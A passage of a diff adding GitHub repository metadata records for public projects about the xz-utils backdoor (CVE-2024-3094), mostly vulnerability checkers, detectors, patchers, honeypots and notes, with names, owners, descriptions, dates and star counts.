"description": null, + "fork": false, + "created_at": "2024-03-29T23:36:07Z", + "updated_at": "2024-03-29T23:36:13Z", + "pushed_at": "2024-03-30T00:34:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 779576477, + "name": "CVE-2024-3094-check", + "full_name": "wgetnz\/CVE-2024-3094-check", + "owner": { + "login": "wgetnz", + "id": 62410571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62410571?v=4", + "html_url": "https:\/\/github.com\/wgetnz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wgetnz\/CVE-2024-3094-check", + "description": null, + "fork": false, + "created_at": "2024-03-30T07:38:39Z", + "updated_at": "2024-04-07T11:15:50Z", + "pushed_at": "2024-03-30T08:08:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779626345, + "name": "xz-backdoor-github", + "full_name": "emirkmo\/xz-backdoor-github", + "owner": { + "login": "emirkmo", + "id": 11209690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11209690?v=4", + "html_url": "https:\/\/github.com\/emirkmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirkmo\/xz-backdoor-github", + "description": "History of commits related to the xz backdoor Discovered On March 29, 2024: CVE-2024-3094.", + "fork": false, + "created_at": "2024-03-30T10:48:54Z", + "updated_at": "2024-05-15T20:20:03Z", + "pushed_at": "2024-04-01T15:12:50Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779717708, + "name": "CVE-2024-3094", + "full_name": "ashwani95\/CVE-2024-3094", + "owner": { + "login": "ashwani95", + "id": 36373739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36373739?v=4", + "html_url": "https:\/\/github.com\/ashwani95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ashwani95\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-30T15:29:05Z", + "updated_at": "2024-03-30T15:29:38Z", + "pushed_at": "2024-03-30T17:00:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779734707, + "name": "xz-utils-vuln-checker", + "full_name": "harekrishnarai\/xz-utils-vuln-checker", + "owner": { + "login": "harekrishnarai", + "id": 63994966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63994966?v=4", + "html_url": "https:\/\/github.com\/harekrishnarai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harekrishnarai\/xz-utils-vuln-checker", + "description": "Checker for CVE-2024-3094 where malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code.", + "fork": false, + "created_at": "2024-03-30T16:25:50Z", + "updated_at": "2024-03-30T19:45:26Z", + "pushed_at": "2024-03-30T17:43:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve", + "cve-2024-3094", + "xz", + "xz-utils" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779754842, + "name": "CVE-2024-3094", + "full_name": "teyhouse\/CVE-2024-3094", + "owner": { + "login": "teyhouse", + "id": 828439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/828439?v=4", + "html_url": "https:\/\/github.com\/teyhouse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teyhouse\/CVE-2024-3094", + "description": "K8S and Docker Vulnerability Check for CVE-2024-3094", + "fork": false, + "created_at": "2024-03-30T17:35:49Z", + "updated_at": "2024-04-26T18:17:21Z", + "pushed_at": "2024-03-31T14:36:00Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779783613, + "name": "CVE-2024-3094-Vulnerability-Checker-Fixer", + "full_name": "alokemajumder\/CVE-2024-3094-Vulnerability-Checker-Fixer", + "owner": { + "login": "alokemajumder", + "id": 26596583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26596583?v=4", + "html_url": "https:\/\/github.com\/alokemajumder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alokemajumder\/CVE-2024-3094-Vulnerability-Checker-Fixer", + "description": "Shell scripts to identify and fix installations of xz-utils affected by the CVE-2024-3094 vulnerability. Versions 5.6.0 and 5.6.1 of xz-utils are known to be vulnerable, and this script aids in detecting them and optionally downgrading to a stable, un-compromised version (5.4.6) or upgrading to latest version. Added Ansible Playbook", + "fork": false, + "created_at": "2024-03-30T19:23:30Z", + "updated_at": "2024-08-04T13:52:01Z", + "pushed_at": "2024-04-07T07:40:48Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [ + "ansible", + "ansible-playbook", + "ansible-playbooks", + "cve-2024-3094", + "linux", + "opensource", + "opensource-projects", + "ssh", + "vulnerabilities", + "vulnerability-detection", + "vulnerability-scanners", + "xz", + "xz-compression-utilities", + "xz-files", + "xz-utils" + ], + "visibility": "public", + "forks": 6, + "watchers": 22, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 779793653, + "name": "CVE-2024-3094", + "full_name": "Horizon-Software-Development\/CVE-2024-3094", + "owner": { + "login": "Horizon-Software-Development", + "id": 81176281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81176281?v=4", + "html_url": "https:\/\/github.com\/Horizon-Software-Development", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Horizon-Software-Development\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-30T20:05:13Z", + "updated_at": "2024-10-01T15:44:03Z", + "pushed_at": "2024-03-30T20:16:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779823084, + "name": "CVE-2024-3094-checker", + "full_name": "hazemkya\/CVE-2024-3094-checker", + "owner": { + "login": "hazemkya", + "id": 83143965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83143965?v=4", + "html_url": "https:\/\/github.com\/hazemkya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hazemkya\/CVE-2024-3094-checker", + "description": null, + "fork": false, + "created_at": "2024-03-30T21:56:17Z", + "updated_at": "2024-03-31T00:17:52Z", + "pushed_at": "2024-03-31T00:40:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779825169, + "name": "xz-vulnerable-honeypot", + "full_name": "lockness-Ko\/xz-vulnerable-honeypot", + "owner": { + "login": "lockness-Ko", + "id": 42625905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42625905?v=4", + "html_url": "https:\/\/github.com\/lockness-Ko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lockness-Ko\/xz-vulnerable-honeypot", + "description": "An ssh honeypot with the XZ backdoor. CVE-2024-3094", + "fork": false, + "created_at": "2024-03-30T22:07:24Z", + "updated_at": "2024-11-08T15:00:46Z", + "pushed_at": "2024-04-02T03:38:32Z", + "stargazers_count": 143, + "watchers_count": 143, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "backdoor", + "cve-2024-3094", + "honeypot", + "xz" + ], + "visibility": "public", + "forks": 20, + "watchers": 143, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 779837781, + "name": "CVE-2024-3094-One-Liner", + "full_name": "brinhosa\/CVE-2024-3094-One-Liner", + "owner": { + "login": "brinhosa", + "id": 1003952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1003952?v=4", + "html_url": "https:\/\/github.com\/brinhosa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brinhosa\/CVE-2024-3094-One-Liner", + "description": null, + "fork": false, + "created_at": "2024-03-30T23:16:10Z", + "updated_at": "2024-04-05T03:16:33Z", + "pushed_at": "2024-04-01T12:09:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779897643, + "name": "CVE-2024-3094", + "full_name": "isuruwa\/CVE-2024-3094", + "owner": { + "login": "isuruwa", + "id": 72663288, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72663288?v=4", + "html_url": "https:\/\/github.com\/isuruwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/isuruwa\/CVE-2024-3094", + "description": "CVE-2024-3094", + "fork": false, + "created_at": "2024-03-31T04:50:09Z", + "updated_at": "2024-03-31T05:32:39Z", + "pushed_at": "2024-03-31T05:31:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3094", + "xz", + "xz-utils" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779977820, + "name": "CVE-2024-3094", + "full_name": "Yuma-Tsushima07\/CVE-2024-3094", + "owner": { + "login": "Yuma-Tsushima07", + "id": 63207324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4", + "html_url": "https:\/\/github.com\/Yuma-Tsushima07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2024-3094", + "description": "A script to detect if xz is vulnerable - CVE-2024-3094", + "fork": false, + "created_at": "2024-03-31T10:45:44Z", + "updated_at": "2024-04-03T04:33:34Z", + "pushed_at": "2024-03-31T11:02:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779978033, + "name": "cve-2024-3094-tools", + "full_name": "jfrog\/cve-2024-3094-tools", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/cve-2024-3094-tools", + "description": null, + "fork": false, + "created_at": "2024-03-31T10:46:33Z", + "updated_at": "2024-07-25T15:39:52Z", + "pushed_at": "2024-04-07T13:07:44Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 37, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 780033593, + "name": "CVE-2024-3094-patcher", + "full_name": "Simplifi-ED\/CVE-2024-3094-patcher", + "owner": { + "login": "Simplifi-ED", + "id": 75945575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75945575?v=4", + "html_url": "https:\/\/github.com\/Simplifi-ED", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Simplifi-ED\/CVE-2024-3094-patcher", + "description": "Ansible playbook for patching CVE-2024-3094", + "fork": false, + "created_at": "2024-03-31T14:09:28Z", + "updated_at": "2024-03-31T14:09:29Z", + "pushed_at": "2024-03-31T15:36:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780105802, + "name": "CVE-2024-3094-Nmap-NSE-script", + "full_name": "gayatriracha\/CVE-2024-3094-Nmap-NSE-script", + "owner": { + "login": "gayatriracha", + "id": 150776676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150776676?v=4", + "html_url": "https:\/\/github.com\/gayatriracha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gayatriracha\/CVE-2024-3094-Nmap-NSE-script", + "description": null, + "fork": false, + "created_at": "2024-03-31T17:53:11Z", + "updated_at": "2024-03-31T17:53:11Z", + "pushed_at": "2024-03-31T17:56:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780121031, + "name": "CVE-2024-3094", + "full_name": "Mustafa1986\/CVE-2024-3094", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-31T18:46:58Z", + "updated_at": "2024-04-01T05:49:11Z", + "pushed_at": "2024-04-01T05:49:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780214985, + "name": "XZ-Utils_CVE-2024-3094", + "full_name": "MrBUGLF\/XZ-Utils_CVE-2024-3094", + "owner": { + "login": "MrBUGLF", + "id": 20143351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20143351?v=4", + "html_url": "https:\/\/github.com\/MrBUGLF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrBUGLF\/XZ-Utils_CVE-2024-3094", + "description": "XZ-Utils工具库恶意后门植入漏洞(CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-01T01:56:08Z", + "updated_at": "2024-04-01T01:59:16Z", + "pushed_at": "2024-04-01T02:03:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780222430, + "name": "cve-2024-3094-detect", + "full_name": "galacticquest\/cve-2024-3094-detect", + "owner": { + "login": "galacticquest", + "id": 162942423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162942423?v=4", + "html_url": "https:\/\/github.com\/galacticquest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galacticquest\/cve-2024-3094-detect", + "description": null, + "fork": false, + "created_at": "2024-04-01T02:25:33Z", + "updated_at": "2024-04-01T13:10:39Z", + "pushed_at": "2024-04-01T03:09:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780339519, + "name": "CVE-2024-3094-info", + "full_name": "mightysai1997\/CVE-2024-3094-info", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2024-3094-info", + "description": null, + "fork": false, + "created_at": "2024-04-01T09:05:47Z", + "updated_at": "2024-04-01T09:06:03Z", + "pushed_at": "2024-04-01T09:05:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780339753, + "name": "CVE-2024-3094", + "full_name": "mightysai1997\/CVE-2024-3094", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-04-01T09:06:25Z", + "updated_at": "2024-04-01T09:06:38Z", + "pushed_at": "2024-04-01T09:06:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780341040, + "name": "xz-backdoor-vulnerability", + "full_name": "mesutgungor\/xz-backdoor-vulnerability", + "owner": { + "login": "mesutgungor", + "id": 4573148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4573148?v=4", + "html_url": "https:\/\/github.com\/mesutgungor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mesutgungor\/xz-backdoor-vulnerability", + "description": "CVE-2024-3094", + "fork": false, + "created_at": "2024-04-01T09:09:54Z", + "updated_at": "2024-04-01T09:18:11Z", + "pushed_at": "2024-04-01T09:18:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780415912, + "name": "CVE-2024-3094", + "full_name": "reuteras\/CVE-2024-3094", + "owner": { + "login": "reuteras", + "id": 449846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/449846?v=4", + "html_url": "https:\/\/github.com\/reuteras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reuteras\/CVE-2024-3094", + "description": "Obsidian notes about CVE-2024-3094", + "fork": false, + "created_at": "2024-04-01T12:41:00Z", + "updated_at": "2024-05-15T20:20:03Z", + "pushed_at": "2024-05-05T08:53:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 780459560, + "name": "xzbot", + "full_name": "amlweems\/xzbot", + "owner": { + "login": "amlweems", + "id": 117625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117625?v=4", + "html_url": "https:\/\/github.com\/amlweems", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amlweems\/xzbot", + "description": "notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-01T14:28:09Z", + "updated_at": "2024-11-26T07:00:07Z", + "pushed_at": "2024-04-03T04:58:50Z", + "stargazers_count": 3497, + "watchers_count": 3497, + "has_discussions": false, + "forks_count": 239, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 239, + "watchers": 3497, + "score": 0, + "subscribers_count": 38 + }, + { + "id": 780480213, + "name": "CVE-2024-3094", + "full_name": "gustavorobertux\/CVE-2024-3094", + "owner": { + "login": "gustavorobertux", + "id": 38466612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38466612?v=4", + "html_url": "https:\/\/github.com\/gustavorobertux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gustavorobertux\/CVE-2024-3094", + "description": "Checker - CVE-2024-3094", + "fork": false, + "created_at": "2024-04-01T15:15:16Z", + "updated_at": "2024-04-03T18:37:25Z", + "pushed_at": "2024-04-02T10:39:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780489939, + "name": "detectar_cve-2024-3094", + "full_name": "ackemed\/detectar_cve-2024-3094", + "owner": { + "login": "ackemed", + "id": 112708193, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112708193?v=4", + "html_url": "https:\/\/github.com\/ackemed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ackemed\/detectar_cve-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-04-01T15:36:58Z", + "updated_at": "2024-04-01T23:04:50Z", + "pushed_at": "2024-04-01T23:04:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780503272, + "name": "xz-cve-2024-3094", + "full_name": "0xlane\/xz-cve-2024-3094", + "owner": { + "login": "0xlane", + "id": 22788893, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22788893?v=4", + "html_url": "https:\/\/github.com\/0xlane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xlane\/xz-cve-2024-3094", + "description": "XZ Backdoor Extract(Test on Ubuntu 23.10)", + "fork": false, + "created_at": "2024-04-01T16:08:50Z", + "updated_at": "2024-11-12T00:50:49Z", + "pushed_at": "2024-04-02T07:12:53Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-3094", + "xz", + "xz-utils" + ], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 780517704, + "name": "CVE-2024-3094", + "full_name": "dah4k\/CVE-2024-3094", + "owner": { + "login": "dah4k", + "id": 84741290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84741290?v=4", + "html_url": "https:\/\/github.com\/dah4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dah4k\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-04-01T16:42:47Z", + "updated_at": "2024-04-01T16:43:31Z", + "pushed_at": "2024-04-01T18:17:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780691332, + "name": "revisaxzutils", + "full_name": "hackingetico21\/revisaxzutils", + "owner": { + "login": "hackingetico21", + "id": 86624859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86624859?v=4", + "html_url": "https:\/\/github.com\/hackingetico21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackingetico21\/revisaxzutils", + "description": "Script en bash para revisar si tienes la vulnerabilidad CVE-2024-3094.", + "fork": false, + "created_at": "2024-04-02T01:22:04Z", + "updated_at": "2024-04-02T01:28:45Z", + "pushed_at": "2024-04-02T01:28:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780700554, + "name": "CVE-2024-3094-XZ-Backdoor-Detector", + "full_name": "devjanger\/CVE-2024-3094-XZ-Backdoor-Detector", + "owner": { + "login": "devjanger", + "id": 55939719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55939719?v=4", + "html_url": "https:\/\/github.com\/devjanger", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devjanger\/CVE-2024-3094-XZ-Backdoor-Detector", + "description": "CVE-2024-3094 XZ Backdoor Detector", + "fork": false, + "created_at": "2024-04-02T01:56:29Z", + "updated_at": "2024-04-02T02:08:37Z", + "pushed_at": "2024-04-02T02:24:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780728046, + "name": "CVE-2024-3094", + "full_name": "ScrimForever\/CVE-2024-3094", + "owner": { + "login": "ScrimForever", + "id": 5040124, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5040124?v=4", + "html_url": "https:\/\/github.com\/ScrimForever", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ScrimForever\/CVE-2024-3094", + "description": "Detectar CVE-2024-3094", + "fork": false, + "created_at": "2024-04-02T03:36:07Z", + "updated_at": "2024-04-02T20:58:00Z", + "pushed_at": "2024-04-02T03:38:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780837798, + "name": "CVE-2024-3094", + "full_name": "pentestfunctions\/CVE-2024-3094", + "owner": { + "login": "pentestfunctions", + "id": 144001335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4", + "html_url": "https:\/\/github.com\/pentestfunctions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestfunctions\/CVE-2024-3094", + "description": "CVE-2024-3094 - Checker (fix for arch etc)", + "fork": false, + "created_at": "2024-04-02T08:55:50Z", + "updated_at": "2024-08-12T00:12:41Z", + "pushed_at": "2024-04-02T09:11:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 781132313, + "name": "xzk8s", + "full_name": "r0binak\/xzk8s", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": "https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/xzk8s", + "description": "Dockerfile and Kubernetes manifests for reproduce CVE-2024-3094", + "fork": false, + "created_at": "2024-04-02T20:07:14Z", + "updated_at": "2024-11-18T23:43:44Z", + "pushed_at": "2024-04-06T16:09:56Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3094", + "exploit", + "k8s", + "xz-utils-backdoor" + ], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 781135899, + "name": "xz-backdoor-links", + "full_name": "przemoc\/xz-backdoor-links", + "owner": { + "login": "przemoc", + "id": 142372, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142372?v=4", + "html_url": "https:\/\/github.com\/przemoc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/przemoc\/xz-backdoor-links", + "description": "apocalypxze: xz backdoor (2024) AKA CVE-2024-3094 related links", + "fork": false, + "created_at": "2024-04-02T20:17:07Z", + "updated_at": "2024-09-10T14:25:55Z", + "pushed_at": "2024-04-20T14:28:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apocalypxze", + "cve-2024-3094", + "xz-utils-backdoor" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 781344373, + "name": "CVE-2024-3094-fix-exploits", + "full_name": "Security-Phoenix-demo\/CVE-2024-3094-fix-exploits", + "owner": { + "login": "Security-Phoenix-demo", + "id": 79762943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79762943?v=4", + "html_url": "https:\/\/github.com\/Security-Phoenix-demo", + "user_view_type": "public" + }, + "html_url": 